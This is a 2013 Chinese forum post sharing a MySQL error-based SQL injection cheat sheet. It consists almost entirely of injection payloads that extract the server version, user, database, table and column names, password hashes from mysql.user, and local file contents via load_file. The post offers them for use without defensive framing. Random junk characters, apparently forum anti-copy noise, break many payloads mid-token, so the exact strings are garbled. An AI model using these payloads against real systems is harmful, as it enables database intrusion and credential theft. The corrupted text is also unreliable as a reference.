本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 , x% r* @8 W0 k- X; L7 `
4 i r) _) b6 u( j
* l T ]2 A' A; g& ]
Mysql暴错注入参考(pdf),每天一贴。。。
& i" E0 e0 n4 J l& d
" [" T8 ]- I9 P* _$ c# ?MySql Error Based Injection Reference
0 a* k w" `) J4 B7 p4 o" m: q5 D V[Mysql暴错注入参考]
b+ u3 `. L8 b! X' G3 @) {5 V% ^Authornig0s1992
* ~8 W: s. l. WBlog:http://pnig0s1992.blog.51cto.com/7 v; p4 S( K+ P0 v: u
TeAm:http://www.FreeBuf.com/
/ U9 Y3 U+ h( xMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
7 f8 a- u: a$ [* j小部分版本使用name_const()时会报错.可以用给出的Method.2测试
3 E: s- x' `4 a2 b! h4 X: i查询版本:
. y* |) H! ^! {8 pMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+- w# a. j/ I) R
join+(select+name_const(@@version,0))b)c)9 u) C' W- X& h* q
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
* k k \; Q5 _) ^7 pup by a)b); N+ {: C& W8 S4 q" U
查询当前用户:$ w* K- h4 X0 Z1 I' {3 J% X; d
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)6 Z7 [1 S. Q. j8 Z9 i0 y4 X9 ^
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r' i9 R7 I. [# o/ g
and(0)*2))x+from+information_schema.tables+group+by+x)a)+ }" R6 W- L0 p9 |( y$ c
查询当前数据库:1 O$ _: k8 i+ S6 |3 e( o5 a/ G
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
- n" {. ~4 H0 ?3 @0 lMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
3 ?) w& L9 U2 y2 h+ _ S+ V6 yor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
1 j" a3 n9 B+ f! h依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
) H9 _9 {4 e5 [LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
' P) ?, I8 i, M/ I2 D7 U! W7 u& Q顺序替换
! ?; R/ F |. ]9 W, O! c爆指定库数目:
5 P% V1 _* K, ?and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
$ x; K2 C5 i, a' E* J) Q* _able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group" u+ J7 x4 Y4 x
+by+x)a)+and+1=1 0x6D7973716C=mysql6 ], A: n" ]( C _9 h& k, `+ f1 H
依次爆表:
! F4 i0 q0 y4 T$ s1 rand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t% y1 }0 M' }6 q" K# [
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta" t' }6 \# A! z1 O, H( O3 w
bles+group+by+x)a)+and+1=1
( w$ V, y; n' R4 @0x6D7973716C=Mysql 将n顺序替换* F R' U6 X3 Z' ^+ S
爆表内字段数目:
( ]5 O- L7 \4 m6 _; c- land+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
! A ~" P U. R+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
* N; X4 D( D# e0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1+ g, H1 W% B5 z7 o, K$ a
依次爆字段:0 e6 X8 j7 @6 w: K
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where' W/ Z% ?! c/ p, \8 D
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1- W2 W1 B( Q+ y
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 将n顺序替换' ^' v5 h9 A8 U7 z0 ]6 S
依次暴内容:
: |' _4 P1 x5 g. Zand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
: \2 s! M3 A* Ima.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
/ `! ~- h6 i! n% S, g0 ^将n顺序替换
5 {9 i8 ^& r, B4 B* O+ G爆文件内容:
8 {7 r# G/ ~ j t; yand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a( W. v" Q' E' x% n: E
from+information_schema.tables+group+by+a)b) $ O2 w8 o7 e8 x$ m( ]" h
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
* o: ^( Q3 @( R6 PThx for reading.9 s6 _( ]9 M& j& u
) Y+ n; c& w3 ~2 B& u$ P
不要下载也可以,
+ j0 v$ o- U: V! A/ \$ V! {+ ^ |